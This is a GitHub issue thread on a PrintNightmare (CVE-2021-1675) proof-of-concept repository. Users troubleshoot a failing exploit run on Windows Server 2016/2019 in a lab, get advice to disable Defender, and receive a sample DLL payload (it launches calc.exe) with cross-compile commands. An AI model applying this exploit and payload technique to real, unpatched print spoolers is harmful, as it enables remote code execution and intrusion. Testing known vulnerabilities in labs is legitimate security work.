cube0x0/CVE-2021-1675

What settings do I need for the Windows server environment

duongdt21 opened this issue · 12 comments

I did it on a virtualized environment using the PoC you provided. However, it always ends with "Stage0:0". Am I missing any step? When using Process Monitor I see my DLL has been included, but nothing happens. Thank you very much.

Try using an x64 payload.

Yes, I'm using Windows Server 2016 and an x64 payload.

Try disabling Defender.

I also turned it off. When I print the exception, it shows the error: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

What path does the script print in the pDriverPath section? Does this path exist on the system?

pDriverPath is found on my Windows. While running the PoC, my DLL file was also written to System32/spool/drivers/x64/3.

Magic!
Try using my DLL payload:

#include <windows.h>

int owned()
{
  WinExec("cmd.exe /c \"calc.exe\"",0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  owned();
  return 0;
}

Linux build:
x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL test.cpp
x86_64-w64-mingw32-g++ -shared -o test.dll test.o -Wl,--out-implib,test.a
find process:
calc.exe or win32calc.exe

I also turned it off. When I print the exception, it shows the error: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND, same problem, how to solve?

I used your PoC DLL. However, it still gives the error :( Can I ask which version of Windows you use to test?

Windows Server 2016 and Windows Server 2019

Yes. I am also using Windows 2019 10.0.17763.737 :((